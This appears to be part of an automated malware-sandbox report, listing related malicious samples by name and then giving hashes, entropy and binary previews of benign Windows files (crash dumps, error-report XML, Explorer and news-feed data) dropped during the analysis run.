                                                                            • 204.79.197.203
                                                                            B4GfvCkDS6.exeGet hashmaliciousMeduza StealerBrowse
                                                                            • 204.79.197.203
                                                                            TT COPY PAYMENT.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 204.79.197.203
                                                                            setup.exeGet hashmaliciousUnknownBrowse
                                                                            • 204.79.197.203
                                                                            Update.jsGet hashmaliciousUnknownBrowse
                                                                            • 204.79.197.203
                                                                            Zahlung.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 204.79.197.203
                                                                            30241696_001.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 204.79.197.203
                                                                            doc2024PO20122024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 204.79.197.203
                                                                            Zahlung.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 204.79.197.203
                                                                            No context
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1310720
                                                                            Entropy (8bit):1.3073403888921744
                                                                            Encrypted:false
                                                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr4:KooCEYhgYEL0In
                                                                            MD5:A6127571599EAC835E19D6502718A44E
                                                                            SHA1:23295C1C70310F76337B3013137A68A053C14226
                                                                            SHA-256:8FE51FC9E30D7B5D4A671A74B838E2080573DDC450E3443B81C631518C5AEABF
                                                                            SHA-512:10090B6F6A9B8CE66ED87993D609DC9404AEF0C53A6EF2DB158B252AB278581BBA41620ED6AC74709DF972BF54B9A5DA80DFC1CF096E04DD534DC671D977E6BA
                                                                            Malicious:false
                                                                            Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x4f227673, page size 16384, DirtyShutdown, Windows version 10.0
                                                                            Category:dropped
                                                                            Size (bytes):1310720
                                                                            Entropy (8bit):0.42209437408727546
                                                                            Encrypted:false
                                                                            SSDEEP:1536:hSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:haza/vMUM2Uvz7DO
                                                                            MD5:2668F130E40C214E4073A58E4258FC7F
                                                                            SHA1:EE75961FE25C8EAD3182A7027D384AC26C96E98B
                                                                            SHA-256:CFC9443CAA036A6BA13DC6F5811C728725F2CF8E2FE5EE84A37D5CB0BCA783FB
                                                                            SHA-512:FC844058F8C6E466A1E7A38D76135D00AD58BBAD93F05EF14C5F88FFF051AB516FCFAFE93B66C782D2B54A7FB59C37DC9736D487AE14AFEA63C857919E89E7B2
                                                                            Malicious:false
                                                                            Preview:O"vs... .......A.......X\...;...{......................0.!..........{A. ....}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................k.". ....}..................B]6. ....}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):16384
                                                                            Entropy (8bit):0.07473971128122159
                                                                            Encrypted:false
                                                                            SSDEEP:3:myYeyImoluhvCjn13a/z5YGlllAllcVO/lnlZMxZNQl:myze4ua53qzGG/lAOewk
                                                                            MD5:CB9126EE25F2E0B04D69EE7E06735270
                                                                            SHA1:C821AEF8472E1BBBC2F46D607CF4B073FD6F4B3D
                                                                            SHA-256:4EC4FC8082DB5D4651E600580ABE2C907175215C6B4DF846D4DB9CA69606B491
                                                                            SHA-512:67296C483852434564F9BB315C6EB573545EC66414BDC29B66CEF0AF9ACD7A7328B6CBFF10C6B6DF4A6F8C9D5B2C2017E270E5A4230750F71084E0C6FBC8D46F
                                                                            Malicious:false
                                                                            Preview:q........................................;...{.. ....}.......{A..............{A......{A..........{A]................B]6. ....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):2.0793968320087
                                                                            Encrypted:false
                                                                            SSDEEP:384:VW5CZ3mVRw13rjwoqRUZ5eRJHzuiFBY4lO8r:g56mVG13rjARUEJHzuiFBY4lO8
                                                                            MD5:3B4DBDC125544117AE0E68972DEFFBE2
                                                                            SHA1:3AA6BBB5EE85647ABA800F701C9FE5339646670D
                                                                            SHA-256:BE11C9BE14720091A008A37EF4B866185372945D7B1CC5141A7F81F3CF1D032F
                                                                            SHA-512:3160F78F6FC8A161A62B03EEF24CA1DDEAF7756F068B925E9D10C665663BEC5D078157ACF2088B10BEA3B130878F3E0737253149DD0E0F44D6EC96D0F79249D1
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.5.7.1.8.6.5.8.6.3.4.8.7.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.7.5.6.b.f.a.-.2.3.f.7.-.4.1.2.3.-.9.5.4.5.-.2.6.a.a.2.1.c.7.b.1.c.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.f.5.1.9.f.a.-.5.9.b.6.-.4.1.e.2.-.b.f.2.6.-.b.1.6.5.8.7.3.6.d.c.5.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.c.0.-.0.0.0.1.-.0.0.1.4.-.6.c.b.8.-.0.8.e.4.6.6.8.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.8.:.2.
                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):2.0346179080896687
                                                                            Encrypted:false
                                                                            SSDEEP:384:Ml+JdCT3mVRw13rj19O9+WG0RxlzuiFBY4lO8r:y+DMmVG13rje9+exlzuiFBY4lO8
                                                                            MD5:CFFC099C78BED5E5ACCCA9316732C65E
                                                                            SHA1:49AA35D9C16C28040C882AB447FDB6353BF1EA1B
                                                                            SHA-256:9E8370796BAC9944EEA1DBAF0D899B7DCCF4AB6DAC2138F2AD5E145288A7BDD8
                                                                            SHA-512:E0D8EDAB39289DB183335E7BA64BFCBDCA1E71719207FAD2F3EA85BBAD2ADDC5EF07205FD15B86736C74B7F215300C98D5FD4EF7E8899DDC5231DFC5AC65405B
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.5.7.1.8.6.4.7.6.9.0.1.4.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.7.3.d.1.f.b.-.3.e.2.6.-.4.a.b.b.-.a.5.b.8.-.4.a.f.0.1.6.b.4.a.d.c.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.1.8.5.7.4.f.-.8.f.3.7.-.4.9.b.4.-.a.4.4.9.-.6.f.0.f.8.a.d.d.6.3.9.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.b.8.-.0.0.0.1.-.0.0.1.4.-.5.6.c.1.-.2.5.d.8.6.6.8.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.8.:.2.
                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Mar 6 07:10:48 2025, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):802610
                                                                            Entropy (8bit):1.4649919005424112
                                                                            Encrypted:false
                                                                            SSDEEP:1536:fXS2vAsbN5I7ogl1l7vK4z/fzb42AZUhbQ/4y6U:fXS2vAsB54l11K+fPTAZDN7
                                                                            MD5:F1C4EA6ACA3922E7B50268215D570F49
                                                                            SHA1:1E1E70D51A77593E6DA6B4A998C3BC79B49C9A35
                                                                            SHA-256:2D0EE65685751970CB18AD797BC400A49543E2198B960E023877CAA1E751B22F
                                                                            SHA-512:F6D93552C6B21F4600D51F86F17BF75639E8612461B1DBAD1773615C1DDAB0B7655A2768E5B49B7A6DF1E4685EF595B5B96FC7D816AD4171D9D701B06A724E22
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... .......xJ.g.........................U..........$....f......$...............`.......8...........T...........X....#...........f...........h..............................................................................eJ......(i......Lw......................T...........fJ.g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8550
                                                                            Entropy (8bit):3.719686680882183
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJJynNi7OeYrc4LnzpDY89bJAnef0M4Ijm:R6lXJcnNeYrc4LnzJ4efN8
                                                                            MD5:ABAF4A09FC2043FA06C0D42ECF10DBC7
                                                                            SHA1:364F35511E02D8229F8B5D994EB3EB625DEF1C90
                                                                            SHA-256:940D3E344EDBF61AE09218B6FF88BD5B862A3BAEFE201AEA0D47534A1B5436D9
                                                                            SHA-512:7B43F4EBF3982BED854D42D2785F0035E86CF0C922E6F39E43827A0A7434EB9B3EC15164654335831AD16F62A221E759F4303A020F376C3888D32BB3767BBC64
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.1.2.0.<./.P.i.
                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4854
                                                                            Entropy (8bit):4.471051119675888
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsltJg771I9GRWpW8VYeYm8M4JY3FRkyq8v2jL2b9Q3Rd:uIjflI7RA7V+JdWpba3Rd
                                                                            MD5:0DDE7B75D2A413C9D5B8609192067748
                                                                            SHA1:F4E63B3C6B0DC2165AEF032411D77E0C5B3C3773
                                                                            SHA-256:AA7E497E40D4FCF34D614531E9F26E5178B8C0BA329E0DE77C4F42B25A6ADCF3
                                                                            SHA-512:0D02267FACDDA85AC7A498F1C17E8ACAC2402EEFB9EBF825F87796C1EB1787E9160C692AE58321AC4F169D81645E154A3C33407A72801A4B0A8FA20C3E3A4AA9
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="748693" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 16 streams, Thu Mar 6 07:10:59 2025, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):1044970
                                                                            Entropy (8bit):1.566344628655729
                                                                            Encrypted:false
                                                                            SSDEEP:3072:QAcI+P2esjZ6/BdW2RjTufBEtfQqi6DzTCEJBRmBmhefFE+wS6CxNIeJ:QAct/mk/Ru5toC
                                                                            MD5:9D87675ED51A7685FF74B7F720DA9908
                                                                            SHA1:F03488AE160F4607DFD080B94C25AEAA6B57E2BE
                                                                            SHA-256:6B5AB2A3536369D6BD5B925C9E97624D35F8A13AD8C6E006107E9C71712EF5FD
                                                                            SHA-512:8BE7F04F0BAACAA671A3BFA3978B0AB76BB44EEA48432B356D322E46973B81200F1DE9D4E3BF557BFB79C9409CE8ABE74A05F93349DFC797505AADBA8FF5B224
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........J.g............4............Y..T.......$...\l......D%..6...........l.......8...........T............-..J............l..........ln...........o..............................................................................eJ.......o......Lw......................T...........zJ.g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8510
                                                                            Entropy (8bit):3.719318629874459
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJqk7Yrc4LnzpDO89bYx3If0Com:R6lXJx7Yrc4LnxYOfF
                                                                            MD5:448E647D654C6EEEAACF2AB00FFA7BBB
                                                                            SHA1:DC495A454646A22C4E9EDFEE70C40F200327B42E
                                                                            SHA-256:4A021F5C0FBDB1FADB2BDA040352FE31994801291AAC0EE4107F7708AD9638AC
                                                                            SHA-512:6F2838AB7BD478A9EF9477E9C816A8A00FB09903F77D419D3640C7C732DFECB7D4C08BFA098F0FD934A69F0AFD44E8E5C278038B68CC9BF3BBACA8B79F05FD46
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.9.2.<./.P.i.
                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4854
                                                                            Entropy (8bit):4.469346816885139
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsltJg771I9GRWpW8VYkyYm8M4JY3F9yq8v2qaab9Q3lfd:uIjflI7RA7VtJeW3aaba3lfd
                                                                            MD5:FA164A5EFFB6DF3E6C5DEC2B4E1BE99E
                                                                            SHA1:82E4B2C16FEAD5AD1559DCEDE249D921EBFDC63E
                                                                            SHA-256:36F22F7BF9CC6EAA761A67B0874BA5017806414366DA5E4E851C53EAF669F239
                                                                            SHA-512:A5420F175E36DAD1CB9DE0CA4B0E41BE3D264F28630BA4071DBAD04D58C46C802E729160C35C9CC140272A40C5F29C3A1A2FB0A0C940950EEC54EDE495F7D847
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="748693" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\explorer.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):108216
                                                                            Entropy (8bit):4.005661820033974
                                                                            Encrypted:false
                                                                            SSDEEP:768:U7F9oInjxkCG8zOPljk0+ACWHpfnzbNyLYduJxP7pxoZsR1v9nvnFOOmdypfR3YH:YdkIz2rJvzgxhGiwGGnS5mFwiKui+l+a
                                                                            MD5:4D0A2A40FDDA2FE41ECF823B86267D55
                                                                            SHA1:08C8761D9C7CD47FBF33BB4B039A639FD1F93235
                                                                            SHA-256:C83500405638BAD92A75F4E7AB1AF465C4818887C06C48D5500ED57494543A28
                                                                            SHA-512:386FB8573F2CA96A4588B70AACDF4C4973BAB5FEAD9450762F1FA4F440E960C88EDCB746CAD667CFBB54FDFC98903F6CB667E9213F331F3BF66ECD821E7EC0B2
                                                                            Malicious:false
                                                                            Preview:....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                                                            Process:C:\Windows\explorer.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):108216
                                                                            Entropy (8bit):4.0053574056198284
                                                                            Encrypted:false
                                                                            SSDEEP:768:fKF9o9njxkRGDzOPljk0+ACWHpfnz/NFLYduJxP7pxoZsR1v9AKwFOOmdypfR3YW:Ndkez2rJvzgIhGiwGGnXumFEiKGi8l+a
                                                                            MD5:169999AE7B6A5EE14E6DDCA35DCC60EB
                                                                            SHA1:53EA0428383E13FF241B066481E57E6415196F80
                                                                            SHA-256:F2B21FB0D719D1C298C5315952964CC57FA2C3AEEAF5CEC088895C321F8E0B3F
                                                                            SHA-512:BFB034D56A20774DB147A67C1DCAA51AFB3C44DBA8BABF34CB856362920154CFDBB259BB1C00525A85D74615E8F2B2166FC974FCD8DD084F8C1D72B856A3C429
                                                                            Malicious:false
                                                                            Preview:....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                                                            Process:C:\Windows\explorer.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):914
                                                                            Entropy (8bit):5.199191755646521
                                                                            Encrypted:false
                                                                            SSDEEP:24:Yzc29HSxTkC3c2wbAVKuHt0drc6hE1opHy:YzDtSxTzDwEwit0drcAEMS
                                                                            MD5:6132001F475C8AB21B976893CF7F92E2
                                                                            SHA1:E19F3922EACE30FB7665304ACA51972B4EA47F19
                                                                            SHA-256:AD5B45BAC10E0BF03D54019A1390067A6677DE536671401355933C21055EF184
                                                                            SHA-512:3CC35933AF806D4C7131BB2EC76D67831E8DF420592D1503870A549693F50257DC1F117FBF6F346306972B5FF0BF9C6220EB6ABED72AAA4C3BB0BFD33F3AAA4A
                                                                            Malicious:false
                                                                            Preview:{"serviceContext":{"serviceActivityId":"42880606-58a0-4a83-8cf5-d1f7612cc74c","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"42880606-58a0-4a83-8cf5-d1f7612cc74c|2025-03-06T07:11:07.7977795Z|fabric_msn|EUS2-A|Msn_84","tier":"\u0000","clientActivityId":"25090651-CE2C-4596-9CEC-2A7C423572D8"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false,"1SlockscreenContentEnabled":true,"setMUIDOnMultipleDomains":false,"uncloakAnimation":false},"isPartial":false}
                                                                            Process:C:\Windows\explorer.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):916
                                                                            Entropy (8bit):5.184707752223461
                                                                            Encrypted:false
                                                                            SSDEEP:24:Yzc2c0Hh1/7kC3c2QXlNaHt0drc6hE1opHy:YzD///7zD8Ot0drcAEMS
                                                                            MD5:B66A4E57D52C6708C954062A9801898A
                                                                            SHA1:D3CDF45E00FFE805D5282E79ED334241D8D7E978
                                                                            SHA-256:50988FA2ADBAE399ABD34FEE9E2F7C9F6345ED25CFC10392F113FAD6D47928A4
                                                                            SHA-512:7613F35FFA2A9EEC0B351B6F060F36E599AEFA441819A96A21288B282D805B0A1F85BD6D9FBF8F88AE388568B2C7CE6C1EB8A7622C188FB97708274F34DE2F64
                                                                            Malicious:false
                                                                            Preview:{"serviceContext":{"serviceActivityId":"224c10b4-f560-4fec-a266-addf6128c74c","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"224c10b4-f560-4fec-a266-addf6128c74c|2025-03-06T07:10:45.6195989Z|fabric_msn|EUS2-A|News_223","tier":"\u0000","clientActivityId":"B2839CD2-4BE9-4400-AD2A-0BF869E77C09"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false,"1SlockscreenContentEnabled":true,"setMUIDOnMultipleDomains":false,"uncloakAnimation":false},"isPartial":false}
                                                                            Process:C:\Windows\explorer.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):916
                                                                            Entropy (8bit):5.200467314172657
                                                                            Encrypted:false
                                                                            SSDEEP:12:YWgc2shCH+0h/mwqkA53c2oh2/H+2yrZMAdrKC8K/y8kEhq1HLxycXNNZ/TCB8QY:Yzc2QCHXvqkC3c2omHt0drc6hE1opHy
                                                                            MD5:B98D02EDB16D20A903C8E6863C066ADD
                                                                            SHA1:98CD56754BD1602714A54C20D82CCA8363A5E686
                                                                            SHA-256:1FB9819545DFE6C691A6CD0506D2195CA4FE0879F16C38920AF6325307C9116B
                                                                            SHA-512:E8AF83E80567893BB028ED92ECF7FB68C4926B1015215F94F880979304D105783CB5191AC88B7FC4A42708F8AD45FCC396E5549E0BE5D9B05F01A144DCDEE8AE
                                                                            Malicious:false
